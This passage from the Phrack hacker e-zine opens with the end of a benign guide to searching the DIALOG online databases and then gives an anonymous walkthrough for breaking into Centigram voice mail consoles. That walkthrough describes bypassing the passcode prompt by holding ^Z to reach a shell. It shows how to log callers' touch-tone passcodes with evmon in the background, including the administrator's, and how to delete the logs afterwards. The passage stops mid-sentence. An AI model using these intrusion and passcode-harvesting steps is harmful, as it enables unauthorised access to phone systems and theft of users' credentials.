NEW MEXICO Albuquerque................................(505)764-9281 NEW YORK Albany.....................................(518)458-8710 Buffalo....................................(716)896-9440 Hempstead..................................(516)489-6868 New York City..............................(212)422-0410 Rochester..................................(716)458-7300 White Plains...............................(914)328-7810 NORTH CAROLINA Research Triangle..........................(919)549-9290 OHIO Cincinnati.................................(513)489-3980 Cleveland..................................(216)621-3807 Columbus...................................(614)461-8348 Dayton.....................................(513)898-8878 OREGON Portland...................................(503)228-2771 PENNSYLVANIA Allentown..................................(215)776-2030 Philadelphia...............................(215)923-5214 Pittsburg..................................(412)471-1421 Valley Forge/Norristown....................(215)666-1500 TEXAS Austin.....................................(512)462-9494 Dallas.....................................(214)631-9861 Houston....................................(713)531-0505 UTAH Salt Lake City.............................(801)532-3071 VIRGINIA Fairfax....................................(703)359-2500 WASHINGTON Seattle....................................(206)282-5009 WISCONSIN Milwaukee..................................(414)796-1785 Access to Dialog Outside of the US Foreign readers may access Dialog via the INFONET PDN. The following numbers are for those particular users. BELGIUM Brussels (300).............................(02)648-0710 Brussels (1200)............................(02)640-4993 DENMARK Copenhagen (300)...........................(01)22-10-66 Copenhagen (1200)..........................(01)22-41-22 Logging in to DIALOG or KNOWLEDGE INDEX (KI) After dialing the appropriate number and establishing the connection, you must allow a 10-second delay and then enter the letter A (or a carriage return or another terminal identifier from the table below) before any further response will occur. Then, follow the remainder of the procedures show below. DIALOG Information Services' DIALNET -2151:01-012- Enter Service: dialog Enter DIALOG or KI; DIALNET: call connected DIALOG INFORMATION SERVICES PLEASE LOGON: ?XXXXXXXX Enter User Number ENTER PASSWORD: ?XXXXXXXX Enter Password; NOTE: I have researched the method of user number and password distribution and all user numbers and passwords are generated by Dialog, BUT upon receiving a password from DIALOG you may opt to change it. The passwords issued from DIALOG are 8 digits long, consisting of random alpha-numeric characters. Once you are connected to your default service or file in DIALOG, you can then BEGIN one of the other services; for example, to access DIALMAIL, BEGIN MAIL. DIALNET Terminal Identifiers Speed Identifier Terminal Type Effect =---------------------------------------------------------------= 300 bps ENTER key PCs & CRTs Same as A E Thermal Printers Slower C Impact Printers Slowest G Belt Printer Slower 1200 bps ENTER key PCs & CRTs Same as A or G Matrix Printers Slower 2400 bps I Belt Printers Slowest - For access in half duplex, enter a < CTRL H > after the "Enter Service:" prompt and before entering the word "dialog" or "ki." - Don't hit backspace if you make an error in typing "dialog" or "ki." The result will be toggling your duplex, reason being your backspace is usually configured to send a < CTRL H > to delete to the left of the cursor one space. DIALNET Messages Message Probable Cause User Action ERROR, RE-ENTER SERVICE Incorrect host name Check typing ALL PORTS BUSY All DIALOG ports Try in a few min. are temporarily in use. HOST DOWN DIALOG computer is Try in a few min. not available. HOST NOT RESPONDING DIALOG Computer Try in a few min. difficulty CIRCUITS BUSY DIALNET Network is Try in a few min. temporarily busy. DIALNET: CALL CLEARED Appears after LOGOFF BY REQUEST to indicate connection ENTER SERVICE: to DIALOG is broken. DROPPED BY HOST SYSTEM Indicates a system failure at DIALOG. Navigating in DIALOG To begin a search, one would enter: BEGIN xxxx xxxx would be the database file number. All databases found on DIALOG are assigned file numbers. The searching protocol used to manipulate DIALOG seems at times to be a language in itself, but it can be easily learned and mastered. DIALOG HOMEBASE I would advise the first-timer to jump into the DIALOG Homebase Menu, which provides information, help, file of the month, database info and rates, the DIALINDEX, DIALOG Training, and announcements. DIALOG also provides subscribers with special services which include dialouts for certain area codes. You can begin the DIALOG HOMBASE by typing: BEGIN HOME =-**************************************************************-= DIALOG DATABASES File Number Database 15 ABI/INFORM 180 Academic American Encyclopedia 43 ADTRACT 108 Aerospace Database 10,110 AGRICOLA 9 AIM/ARM 38 America:History & Life 236 American Men & Women of Science 258,259 AP NEWS 45 APTIC 112 Aquaculture 116 Aqualine 44 Aquatic Science & Fisheries ABS 56 Art Bibliographies, Modern 192 Arthur D. Little On-Line 102 ASI 285 BIOBUSINESS 287,288 Biography Master Index 5, 55 255 BIOSIS Previews 175 BLS Consumer Price Index 178 BLS Employment, Hours, and Earnings 176 BLS Producer Price Index 137 Book Review Index 470 Books In Print 256 Business Software Database 308-311 320 CA Search 50 CAB Abstracts 262 Canadian Business and Current Affairs 162 Career Placement Registry/ Experienced Personnel 163 Career Placement Reg/Student 580 CENDATA 138 Chemical Exposure 19 Chemical Industry Notes 174 Chem Regulations & Guidelines 300,301 CHEMNAME, CHEMSIS 328-331 CHEMZERO 30 CHEMSEARCH 64 Chile Abuse & Neglect 410 Chronolog Newsletter-International Edition 101 Compuserve Information Service 220-222 CLAIMS Citation 124 CLAIMS Class 242 CLAIMS Compound Registry 23-25,125 223-225 CLAIMS US Patents 123 CLAIMS Reassignment & Re-examination 219 Clinical Abstracts 164 Coffeeline 194-195 Commerce Business Daily 593 Compare Products 8 Compendex 275 The Computer Database 77 Conference Papers Index 135 Congressional Record Abstracts 271 Consumer Drug Info Fulltext 171 Criminal Justice Period Index 60 CRIS/USDA 230 DATABASE OF DATABASES 516 D&B - Dun's Market Identifiers 517 D&B - Million Dollar Directory 518 D&B - International Dun's Market Identifiers 411 DIALINDEX 200 DIALOG PUBLICATIONS 100 Disclosure II 540 Disclosure Spectrum Ownership 35 Dissertation Abstracts On-Line 103,104 DOE Energy 575 Donnelley Demographics 229 Drug Information Fulltext 139 Economic Literature Index 165 Ei Engineering Meetings 241 Electric Power Database 511 Electronic Dictionary of Education 507 Construction Directory 501 Financial Services Directory 510 Manufactures Directory 502 Professionals Directory 504-506 Retailers Directory 508,509 Services Directory 503 Wholesalers Directory 500 Electronic Yellow Pages Index 72, 73 EMBASE (Excerpta Medica) 172,173 EMBASE 114 Encyclopedia of Associations 69 Energyline 169 Energynet 40 ENVIROLINE 68 Environmental Bibliography 1 eric 54 Exceptional Child Education Resources 291 Family Resources 20 Federal Index 136 Federal Register Abstracts 265 Federal Research in Progress 196 Find/SVP Reports and studies Index 268 FINIS: Financial Industry Information Service 96 Fluidex 51 Food Science & Technology Abstracts 79 Foods Adlibra 90 Foreign Trade & Econ Abstracts 105 Foreign Traders Index 26 Foundation Directory 27 Foundation Grants Index 58 Geoarchive 89 Georef 66 GPO Monthly Catalog 166 GPO Publications Reference File 85 Grants 122 Harvard Business Review 151 Health Planning And Administration 39 Historical Abstracts 561 ICC British Company Directory 562 ICC British Financial Datasheets 189 Industry Data Sources 202 Information Science Abstracts 12, 13 INSPEC 168 Insurance Abstracts 209 International Listing Service 74 International Pharmaceutical Abstracts 545 Investext 284 IRS TAXiNFO 14 ISMEC 244 LABORLAW 36 Language & Language Behavior Abstracts 426-427 LC MARC 150 Legal Resource Index 76 Life Sciences Collection 61 LISA 647 Magazine ASAP 47 Magazine Index 75 Management Contents 234 Marquis Who's Who 235 Marquis Pro-files 239 Mathfile 546 Media General Database 152-154 MEDLINE 86 Mental Health Abstracts 232 Menu The International Software Database 32 METADEX 29 Meteor/Geoastrophysical Abstracts 233 Microcomputer Index 32 MERADEX 29 Meteor/Geoastrophysical Abstracts 233 Microcomputer Index 248 The Middle East: Abstracts and Index 249 Mideast File 71 MLA Bibliography 555 Moody's Corporate Profiles 557 Moody's Corporate News-International 556 Moody's Corporate News - U.S. 78 National Foundations 111 National Newspaper News - U.S. 21 NCJRS 211 Newsearch 46 NICEM 70 NICSEM/NIMIS 118 Nonferrous Metals Abstracts 6 NTIS 218 Nursing & Allied Health 161 Occupational Safety and Health 28 Oceanic Abstracts 170 ON-LINE Chronicle 215 ONTAP ABI/INFORM 205 ONTAP BIOSIS Previews 204 ONTAP CA SEARCH 250 ONTAP CAB Abstracts 231 ONTAP Chemname 208 ONTAP Compendex 290 ONTAP DIALINDEX 201 ONTAP ERIC 272 ONTAP Embase 213 ONTAP Inspec 247 ONTAP Magazine Index 254 ONTAP Medline 216 ONTAP PTS Promt 294 ONTAP Scisearch 207 ONTAP Social Scisearch 296 ONTAP Trademarkscan 280 ONTAP World Patents Index 49 PAIS International 240 Paperchem 243 PATLAW 257 P/E News 241 Peterson's College Database 42 Pharmaceutical News Index 57 Philosopher's Index 41 Pollution Abstracts 91 Population Bibliography 140 PsycALERT 11 PsycINFO 17 PTS Annual Reports Abstracts 80 PTS Defense Markets and Technology 18 PTS F&S Indexes 80- 98 PTS F&S Indexes 72-79 81, 83 PTS Forecasts 570 PTS MARS 16 PTS PROMPT 82, 84 PTS TIME SERIES 190 Religion Index 421-425 TEMARC 97 Rilm Abstracts 34, 87 SciSearch 94, 186 SciSearch 7 Social Scisearch 270 Soviet Science and Technology 37 Sociological Abstracts 62 SPIN 65 SSIE Current Research 132 Standard & Poor's News 133 Standard & Poor's Corporate Descriptions 526 Standard & Poor's Register-Biographical 527 Standard & Poor's Register-Corporate 113 Standards & Specifications 238 Telgen 119 Textile Technology Digest 535 Thomas Tegister On-Line 648 Trade & Industry ASAP 148 Trade & Industry Index 106,107 Trade Opportunities 226 Trademarkscan 531 Trinet Establishment Database 532 Trinet Company Database 63 TRIS 52 TSCA Initial Inventory 480 Ulrich's International Periodicals Directory 260,261 UPI NEWS 126 U.S. Exports 93 U.S. Political Science Documents 120 U.S. Public School Directory 184 Washington Post Index 117 Water Resources Abstracts 350,351 World Patents Index 67 World Textiles 185 Zoological Record Before I continue describing the various methods of searching, DIALOG has an on-line master index to the DIALOG databases, DIALINDEX (file 411). It is a collection of the file indexes of most DIALOG databases (menu-driven databases cannot be searched in DIALINDEX). DIALINDEX can be used to determine the number of relevant records for a single query in a collection of files. The query can be a single term, a multiple-word phrase, a prefix-coded field, or a full logical expression of up to 240 characters. Nested terminology, proximity operators, and truncated terms may also be used. You can set the files you want searched by using the SET FILE command. Like this: BEGIN 411 (return) SET FILE ALLNEWS (if you want the latest news on or hack/phreak busts) SF ALLNEWS To scan all Subjects: SET FILES ALL To scan specific categories: All Science: (ALLSCIENCE) - Agriculture & Nutrition - Chemistry - Computer Technology - Energy & Environment - Medicine & Biosciences - Patents & Trademarks - Science & technology All Business: (ALLBUSINESS) - Business Information - Company Information - Industry Analysis - News - Patents & Trademarks All News and Current Events: (ALLNEWS) - News All Law & Government: (ALLLAW;ALLGOVERNMENT) - Law & Government - Patents & Trademarks All Social Science & Humanities: (ALLSOCIAL;ALLHUMANITIES) - Social Sciences & Humanities All General Interest: (ALLGENERAL) - Popular Information All Reference: (ALLREFERENCE) - Books - Reference All Text: (ALLTEXT) All databases containing complete text of: - Journal Articles - Encyclopedias - Newspapers - Newswires All Sources: (ALLSOURCE) - Complete Text - Directory - Numeric Data All ONTAP Training Files: (ALLONTAPS) - All On-Line Training And Practice databases Once you have selected a database you can now SELECT the search keyword. You set the flag by: SELECT term - Retrieves a set of records containing the term. May be used with words, prefix or suffix codes, EXPAND, or set numbers. When defining what you are searching for you can use logical operators such as: OR - puts the retrieval of all search terms into one set, eliminating duplicate records. AND - retrieves the intersection, or overlap, of the search terms: all terms must be in each record retrieved. NOT - eliminates search term (or group of search terms) following it from other search term(s). Note: Always enter a space on either side of a logical operator. SELECT Examples: SELECT (BICMOS OR CMOS) AND SRAM or S (BICMOS OR CMOS) AND SRAM - This would generate something like this: 138 BICMOS <- records containing BICMOS only 1378 CMOS <- records containing CMOS only 681 SRAM <- records containing SRAM only S1 203 (BICMOS OR CMOS) AND SRAM <- this is what you ^^ wanted. || DIALOG names your select topic S1, S2... respectively as search its databases to make it easier to type. The contents of S1 are 203 found records containing the keywords BICMOS, CMOS, and SRAM. Sometimes S1 is referred to as S(tep) 1 PROXIMITY OPERATORS (Select command) (W) Requests terms be adjacent to each other and in order specified. -> S SOLAR(W)ENERGY (nW) Requests terms be within (n) words of each other and in order specified. -> S SOLAR(3W)ENERGY (N) Requests terms be adjacent but in any order. Useful for retrieving identical terms. -> S SOLAR(N)ENERGY (nN) Requests terms be within (n) words of each other and in any order. -> S SOLAR(3N)ENERGY (F) Requests terms be in same field of same record, in any order. -> S SOLAR(F)ENERGY (L) Requests terms be in same descriptor unit as defined by database. -> S SOLAR(L)ENERGY (S) Requests terms be in same Subfield unit as defined by database. -> S SOLAR(S)ENERGY (C) Equivalent to logic operator AND. -> S SOLAR(C)ENERGY PRIORITY OF EXECUTION Proximity operator, NOT, AND, OR Use parentheses to specify different order of execution, e.g. SELECT (SOLAR OR SUN) AND (ENERGY OR HEAT). Terms within parentheses are executed first. STOP WORDS (predefined) The following words may not be SELECTed as individual terms. The computer will retrieve a set with zero results. They may only be replaced with proximity operators, e.g. S GONE(2W)WIND AN FOR THE AND FROM TO BY OF WITH RESERVED WORDS AND SYMBOLS The following words and symbols must be enclosed in quotation marks whenever they are SELECTed as or within search terms, e.g., SELECT "OR"(W)GATE? AND = FROM * NOT + OR : STEPS / TRUNCATION OPEN: any number of characters following stem. SS EMPLOY? RESTRICTED: only one additional character following stem. SS HORSE? ? RESTRICTED: maximum number of additional characters equal to number of question marks entered. SS UNIVERS?? INTERNAL: allows character replaced by question mark to vary. One character per question mark. SS WOM?N BASIC INDEX FIELD SPECIFICATION (SUFFIX CODES) Suffix codes are used to restrict retrieval to specified basic index fields of a record. Specific fields and codes vary according to the database. Abstract /AB Descriptor /DE Full Descriptor(single word) /DF Identifier /ID Full Identifier(single word) /IF Title /TI Note /NT Section Heading /SH Examples: SELECT BUDGET?/TI SELECT POP(W)TOP(W)CAN?/TI,AB SELECT (DOLPHIN? OR PORPOISE?)/DE/ID ADDITIONAL INDEXES (PREFIX CODES) Prefix codes are used to search additional indexes. Specific fields and codes vary according to the database. Author AU= Company Name CO= Corporate Source CS= Document Type DT= Journal Name JN= Language LA= Publication Year PY= Update UD= Examples: SELECT AU=JOHNSON, ROBERT? SELECT LA=GERMAN SELECT CS=(MILAN(F)ITALY) RANGE SEARCHING A colon is used to indicate a range of sequential entries to be retrieved in a logical OR relationship. Examples: SELECT CC=64072:64078 SELECT ZP=662521:62526 LIMIT QUALIFIERS Limit qualifiers are used in SELECT statements to limit search terms or sets to given criteria. Specific qualifiers vary according to database. English language documents /ENG Major descriptor /MAJ Patents /PAT Human subject /HUM Accession number range /nnnnnn-nnnnnn Examples: SELECT TRANSISTORS/ENG,PAT SELECT S2/MAJ SELECT (STRESS OR TENSION)/234567-999999 Well that's it for basic searching. Now, how to view the record you have selected. Note: Indexes (prefix codes) often differ from database to database, often resulting in futile searches. One way to avoid this is to make a trip to the local Public or University Library and look up the blue sheets for the database you wish to query. Blue sheets are issued by dialog as a service to their users. Blue Sheets often contain helpful searching techniques ere to the database you are interested in. They will also contain a list of Indexes (prefix codes) unique to that database only. VIEWING SEARCH RESULTS COMMAND SUMMARY TYPE Provides continuous on-line display of results. T Specify set/format/range of items. If Item range is specified, use T to view next record. May also be used with specific accession number. Examples: T 12/3/1-22 <- set/format/range T 8/7 <- set/format T 6 <- view next.(6 in this case) T 438721 <- view record 438721 DISPLAY Provides display of results one screen at a time. Use D PAGE for subsequent screens. Specify set/format/range of items. If range not specified, use D to view next record. May also be used with specific accession number. Examples: D 11/6/1-44 <- set/format/range D 9/5 <- set/format D 7 <- view next.(7 in this case) D 637372/7 <- view record 637372/format 7 PRINT Requests that results be printed offline and mailed. Specify set/format/range of items. If item range not specified up to 50 records will be printed. Use PR to print another 50. Examples: PR 9/5/1-44 <- print set/format/range PR 6/7 <- print set/format (all) PR 14 <- print 14 only PR 734443/5 <- print 734443 format 5 only. PRINT TITLE xxx To specify a title(xxx) to appear on PRINTs. Title may contain up to 70 characters. No semicolon may be used. Must be entered in database before any other PRINT command is used. Cancelled by next BEGIN. Examples: PR TITLE GLOBULIN PR TITLE QUETZAL REPORT Extracts data from specified fields and produces tabular format for on-line output only. Specify set/range of items/fields. May be used with SORTED set to specify order of entries in table. Application is database-specific. TYPICAL FORMATS IN BIBLIOGRAPHIC FILES: Format Number Description 1 DIALOG Accession Number 2 Full Record except Abstract 3 Bibliographic Citation 5 Full Record 6 Title 7 Bibliographic Citation and Abstract 8 Title and Indexing NOTE: Again, the Formats differ from database to database. See database bluesheet for specific format descriptions. OTHER OUTPUT-RELATED COMMANDS: PRINT CANCEL Used alone, cancels preceding PRINT command. PR CANCEL Specify PRINT Transaction Number to cancel PRINT- any PRINT request entered in past two hours, PR- e.g. PRINT- P143 PRINT QUERY To view log of PRINT commands and cancellations. Add PR QUERY DETAIL to see date, time and costs. PRINT QUERY ACTIVE To view log of PRINT commands that may still be cancelled. PR QUERY ACTIVE Add DETAIL to see date, time, file and costs. SORT Sorts set of records on-line according to parameters indicated. Varies per database. Specify set number/range/field,sequence, e.g. SORT 4/1-55/AU,TI Sequence assumed ascending if not specified; use D to specify descending order. SORT parameters may be added to end of PRINT command for offline sorting, e.g. PRINT 9/5/ALL/SD,D SET SCREEN nn nn Sets size of screen for video display. SET H nn H (horizontal) given first in combined command. SET V nn V Default is 75 characters H, 40 lines V LOGOFF Disconnects user from DIALOG system. LOGOFF HOLD Disconnects user from DIALOG system, holds work for 10 minutes allowing RECONNECT. OTHER COMMANDS: DISPLAY SETS Lists all sets formed since last BEGIN command. DS May specify range of sets, e.g. DS 10-22. EXPLAIN Requests help messages for commands and file features. Enter ?EXPLAIN to see complete list. KEEP Places records indicated in special set 0. Specify K set number/records, or accession number. Cancelled by a BEGIN command. Also used in DIALORDER. LIMITALL Limits all subsequent sets to criteria specified. Varies per database. LIMITALL/ALL Cancels previous LIMITALL command. ?LIMIT n Requests list of limit qualifiers for database n. SEARCH*SAVE SAVE Stores strategy permanently until deleted. Serial number begins with S. SAVE TEMP Stores strategy for seven days; automatically deleted. Serial number begins with T. SAVE SDI Stores strategy and PRINT command(s) until deleted. PRINT command required. Automatically executes strategy against each new update to database in which entered. Serial number begins with D. MAPxx Creates a Search*Save of data extracted for field xx of MAPxx TEMP records already retrieved. MAPxx STEPS If STEPS is used, data is formatted into separate search statements in Search*Save. REVIEWING SEARCH*SAVES RECALL nnnnn Recalls Search*Save nnnnn, displaying all set-producing commands and comment lines, without executing the search. RECALL SAVE Displays serial numbers of all permanent SAVEs, date entered, and number of lines. RECALL TEMP Displays serial numbers of all temporary SAVEs, date entered, and number of lines. RECALL SDI Displays serial numbers of all SDIs, dates entered, databases in which stored, and number of lines. EXECUTING SEARCH*SAVES EXECUTE nnnnn Executes entire strategy. Only last line is assigned a EX nnnnn set number. EXECUTE STEPS nnnnn Executes entire strategy. Assigns set number to each EXS nnnnn search element. Preferred form. EXECUTE nnnnn/x-y Executes strategy nnnnn form command line x to command line y only. STEPS may also be used: EXS nnnnn/x-y EXECUTE nnnnn/USER a Executes strategy nnnnn originally entered by user a (a=user number). STEPS may also be used: EXS nnnnn/USER a EXECUTE nnnnn/x-y/USER a Executes strategy nnnnn from command line x to command line y, originally entered by user a. STEPS may also be used: EXS nnnnn/x-y/USER a DELETING SEARCH*SAVES RELEASE nnnnn Deletes search nnnnn from system. OTHER SEARCH*SAVE OPTIONS NAMING: A three to five alphanumerical name may be specified following the SAVE, SAVE TEMP, and SAVE SDI commands. Example: SAVE TEMP SOLAR COMMENTS: An informative comment may be stored in a SEARCH*SAVE by entering an asterisk in place of a command, followed by up to 240 characters of "comment." The line will be saved with any SEARCH*SAVE command, and will display in RECALL of the search. Example: * Search for R.J.Flappjack ON-LINE TEXT EDITOR Any Search*Save, with the exception of an SDI, may be edited from within any database. An SDI must be edited within the database in which the SDI is to be stored. EDIT To enter Editor and create new text. EDIT xxxxx Pulls Search*Save xxxxx into Editor for editing. LIST Displays text to be edited. L OPTIONS: LIST LIST 30-110 LIST ALL LIST 10,50,80 LIST /data/ Locates all lines containing data. INSERT Adds onto end of text. INSERT nn Inserts line nn into text. I To return to EDIT from INSERT, enter a period on a I nn blank line. DELETE To delete line(s) of text. D OPTIONS: DELETE 10-50 DELETE 10,30-50 DELETE ALL CHANGE To change text within a line. C Changes only first occurrence of old text in any given line. OPTIONS: CHANGE 60/old/new (where 60 is line number) CHANGE 60/old// (deletes old) C 60//new (inserts new at beginning of line) C 80.old.new (when text contains slash) C /old/new (new replaces old on all lines) C 20,40/old/new (nonsequential lines) C 30-50/old/new (range of lines) COPY Duplicates line# TO line# CO OPTIONS: COPY 100 to 255 COPY 100-150 TO 255 COPY 100,130 TO 255 MOVE Move line# TO line# M Options same as COPY. QUERY Produces message giving name of file, number of lines, last line Q number. RENUM Renumbers lines by tens unless otherwise specified. R OPTIONS: RENUM n (Renumbers by increments of n) QUIT Used to leave editor ignoring session. SAVE Used to create Search*Save strategy from edited file. SAVE TEMP An SDI must include a PRINT command. SAVE SDI Enjoy the DIALOG Information Network. I've found it most interesting. This service is a MUST if you are in college or if you just love to learn as uch as time permits. It is a proven research tool used by R&D and university facilities around the world, as well as a refined corporate intelligence information gathering tool kept hidden from the general public by sheer expense and "pseudo-complexity." With on-line databases like DIALOG available, there is no excuse (besides lack of time) for self-education. ***************************************************************** Brian Oblivion can be reached at Oblivion@ATDT.ORG. Additionally, he can be reached at Black Crawling Systems/VOiD Information Archives (for more information, e-mail Brian). RDT welcomes any questions or comments you may have. See you at SummerCon '92. _______________________________________________________________________________ ==Phrack Inc.== Volume Four, Issue Thirty-Nine, File 6 of 13 Centigram Voice Mail System Consoles Proper Entry Procedure, Design Flaws, and Security Bugs by >Unknown User< *** Note from Phrack Staff: This file was submitted to Phrack anonymously. *** *** The author used SMTP fake mail to send it to the Phrack e-mail address. *** *** Phrack cannot make any claims about the validity or the source of the *** *** information found in this article. *** Due to more efficient task-handling and the desire for a more "Unix-like" environment, the developers at Centigram needed for certain key functions to be available at all times. For instance, the ^Z key acts as the "escape" key (these can be remapped, if desired). When necessary for some applications to use an "escape" procedure, pressing this key can, in at least a few cases, cause a drop to shell, or /cmds/qnxsh (possibly /cmds/sh, as well, but I'm used to seeing qnxsh). If this escape procedure was invoked during, say, /cmds/login, the resulting drop to shell would by-pass the "Enter Passcode:" message. And it does. After calling the Centigram, normal procedure is to hit ^Z to activate the terminal, followed by the entry of the remote or console passcodes, and then proceeding with normal console activities. However, if ^Z is continually depressed during the login sequence, the login program will abort and run /cmds/qnxsh. The behavior may be somewhat erratic by the repeated use of the escape key, but when the $ prompt appears, usually, it doesn't deliberately go away without an "exit" command or a ^D. Typically, a login pattern can develop to accommodate the erratic behavior something along the lines of: continuously depress ^Z until $ prompt appears, hit return, possibly get "Enter Passcode:" message, hit return, and $ prompt appears again, set proper TTY setting, and change directory appropriately, and continue with normal console functions. Initial STTY Setting: I've had problems with my terminal settings not being set properly during the above entry procedure. I can correct this by using the "stty +echo +edit" command, and, for my terminal, all is restored. The correct values for STTY options and keys appear to be: Options: +echo +edit +etab +ers +edel +oflow +mapcr +hangup break=03h esc=1Ah rub=7Fh can=18h eot=04h up=15h down=0Ah left=08h ins=0Eh del=0Bh The keymap, of course, can be modified as desired, but the options, especially +edit, appear to be necessary. Disks and Directories: The drives and directories are set up in a remotely MessDos fashion. The output of a "pwd" command looks similar to "4:/". "4:" represents the drive number, and "/" is the start of the directory structure, "4:/" being the root directory for drive 4, "3:/tmp" being the /tmp directory on drive 3, etc. The two most important directories are 1:/cmds and 4:/cmds, which contain, for the most part, the program files for all of the performable commands on the system, excluding the commands written into the shell. The directory 1:/cmds should look similar to: $ ls backup drel ls rm talk chattr eo mkdir rmdir tcap choose fdformat mount runfloppy timer clrhouse files p search tsk cp frel pack sh unpack date get_boolean patch slay ws ddump led pwd sleep zap diff led.init qnxsh spatch dinit login query stty This is a display of many useful commands. chattr changes the read/write file attributes, cp is copy, ddump dumps disk sectors in hex & ascii, led is the line editor, p is the file print utility, and a variety of other things that you can experiment with at your own leisure. DO NOT USE THE TALK COMMAND. At least, be careful if you do. If you try to communicate with your own terminal, it locks communication with the shell, and upon hangup, for some reason, causes a major system error and system-wide reboot, which, quite frankly, made me say, "Oops. I'm not doing that again" when I called to check on the actual voice mailboxes, and the phone line just sat there, dead as old wood. I was quite relieved that it came back up after a few minutes. The other directory, 4:/cmds, is filled with more specific commands pertaining to functions within the voice mail system itself. These programs are actually run from within other programs to produce an easy-to-understand menu system. Normally, this menu system is immediately run after the entry of the remote or console passcode, but it would not be run when using the aforementioned security bug. It can be run from the shell simply by typing the name of the program, console. Mounting and Initializing Drives: The MOUNT command produces results similar to this when run without arguments: $ mount Drive 1: Hard, 360k, offset = 256k, partition= Qnx Drive 2: Floppy, 360k, p=1 Drive 3: RamDisk, 96k, partition= Qnx Drive 4: Hard, 6.1M, offset = 616k, partition= Qnx $tty0 = $con , Serial at 03F8 $tty1 = $term1 , Serial at 02F8 $tty2 = $term2 , Serial at 0420 $tty3 = $mdm , Serial at 0428 The hard and floppy drives are fairly self-explanatory, although I can't explain why they appear to be so small, nor do I know where the voice recordings go, or if this list contain all the space required for voice storage. The ramdisk, however, is a bit more interesting to me. The mount command used for the above-mentioned disk 3 was: $ mount ramdisk 3 s=96k -v Although I'm not sure what the -v qualifier does, the rest is fairly straight forward. I assume that the size of the drive can be greater than 96k, although I haven't yet played with it to see how far it can go. To initialize the drive, the following command was used: $ dinit 3 Quite simple, really. Now, the drive is ready for use so one can "mkdir 3:/tmp" or some such and route files there as desired, or use it for whatever purpose. If something is accidentally redirected to the console with >$cons, you can use the line editor "led" to create a temporary file and then use the print utility "p" to clear the console's screen by using "p filename >$cons" where filename contains a clear screen of 25 lines, or an ANSI bomb (if appropriate), or a full-screen DobbsHead or whatever you like. EVMON and password collecting: The evmon utility is responsible for informing the system manager about the activity currently taking place within the voice mail system. Run alone, evmon produces output similar to: $ evmon Type Ctrl-C to terminate. ln 26 tt 3 ln 26 line break ln 26 onhook ln 28 ringing ln 28 tt 8 ln 28 tt 7 ln 28 tt 6 ln 28 tt 2 ln 28 offhook ln 28 tt * ln 28 tt 2 ln 28 tt 0 ln 28 tt 3 ln 28 tt 0 ln 28 line break ln 28 onhook [...] And so forth. This identifies a certain phone line, such as line 28, and a certain action taking place on the line, such as the line ringing, going on or offhook, etc. The "tt" stands for touch tone, and it is, of course, the tone currently played on the line; which means that touchtone entry of passcodes can be recorded and filed at will. In the above example, the passcode for Mailbox 8762 is 2030 (the * key, along with the 0 key, can acts as the "user entering mailbox" key; it can, however, also be the abort key during passcode entry, and other things as well). Now the user, of course, doesn't usually dial 8762 to enter his mailbox; he simply dials the mailbox number and then * plus his passcode; the reason for this is the type of signalling coming from the switch to this particular business line was set-up for four digit touch tone ID to route the line to the appropriate called number. This is not the only method of signalling, however, as I've seen other businesses that use three digit pulse signalling, for example, and there are others as well. Each may have it's own eccentricities, but I would imagine that the line ID would be displayed with EVMON in most cases. Now, let's say we're on-line, and we want to play around, and we want to collect passcodes. We've set up our ramdisk to normal size and we are ready to run evmon. We could run it, sit at our terminal, and then record the output, but it's such a time consuming task (this is "real-time," after all) that sitting and waiting be nearly pointless. So, we use the handy features of run-in-background and file-redirection (see, I told you we were getting "Unix-like"). $ evmon > 3:/tmp/output & Type Ctrl-C to terminate. 5e1e $ ... 5e1e is the task ID (TID) of the new evmon process. Now we can go off and perform whatever lists we want, or just play in the directories, or route DobbsHeads or whatever. When we decide to end for the day, we simply stop EVMON, nab the file, remove it, and if necessary, dismount the ramdisk. $ kill 5e1e $ p 3:/tmp/output [ EVMON output would normally appear; if, however, ] [ there is none, the file would be deleted during ] [ the kill with an error message resulting ] $ rm 3:/tmp/output $ rmdir 3:/tmp $ mount ramdisk 3 and now we can ^D or exit out of the shell and say good-bye. The good thing about this EVMON procedure is that you don't need to be on-line while it runs. You could start a task sometime at night and then wait until the next day before you kill the process and check your results. This usually produces large log files anywhere from 40K to 200K, depending upon the amount of system usage (these figures are rough estimates). If, however, you start the EVMON task and leave it running, then the administrator will not be able to start a new EVMON session until the old task is killed. While this probably shouldn't be a problem over the weekends, during business hours it may become a little risky. Remember though, that the risk might be worth it, especially if the administrator decides to check his mailbox; you'd then have his passcode, and, possibly, remote telephone access to system administrator functions via touch- tone on the mailbox system. Task management: As we have just noted, any task like EVMON can be run in the background by appending the command line with a &, the standard Unix "run-in-background" character. A Task ID will echo back in hexadecimal, quite comparable to the Unix Process ID. The program responsible for task management is called "tsk" and should be in 1:/cmds/tsk. Output from running tsk alone should look something like: $ tsk Tty Program Tid State Blk Pri Flags Grp Mem Dad Bro Son 0 task 0001 READY ---- 1 ---IPLA----- 255 255 ---- ---- ---- 0 fsys 0002 RECV 0000 3 ---IPLA----- 255 255 ---- ---- ---- 0 dev 0003 RECV 0000 2 ---IPLA----- 255 255 ---- ---- ---- 0 idle 0004 READY ---- 15 ----PLA----- 255 255 ---- ---- 0508 0 /cmds/timer 0607 RECV 0000 2 -S--P-AC---- 255 255 ---- ---- ---- 0 /cmds/err_log 0509 RECV 0000 5 -S--P--C---- 255 255 0A0A ---- ---- 0 /cmds/ovrseer 0A0A REPLY 0607 5 -S--P--C---- 255 255 ---- ---- 030C 0 /cmds/recorder 010B REPLY 0509 5 -S--P--C---- 255 255 0A0A 0509 ---- 0 /cmds/master 030C REPLY 0607 5 -S--P--C---- 255 255 0A0A 010B 011C [ ... a wide assortment of programs ... ] 0 /cmds/vmemo 011C REPLY 0110 13 -S-----C---- 255 255 030C 011B ---- 3 /cmds/comm 0508 RECV 5622 8 ----P-A----- 255 255 0004 ---- 5622 3 /cmds/tsk 051D REPLY 0001 8 ------------ 255 255 301E ---- ---- 3 /cmds/qnxsh 301E REPLY 0001 14 ---------E-- 255 255 5622 ---- 051D 3 /cmds/login 5622 REPLY 0003 8 -------C---- 255 255 0508 ---- 301E Although I'm not quite sure at some of the specifics displayed in this output, the important parts are obvious. The first column is the TTY number which corresponds to the $tty list in "mount" (meaning that the modem I've just called is $tty3, and I am simultaneously running four tasks from that line); the second column is the program name (without the drive specification); the third column is the task ID; the middle columns are unknown to me; and the last three represent the ties and relations to other tasks (parent task ID, another task ID created from the same parent, and task ID of any program called). Knowing this, it's easy to follow the tasks we've created since login. Initially, task 0508, /cmds/comm, was run, which presumably contains the requisite "what should I do now that my user has pressed a key?" functions, which called 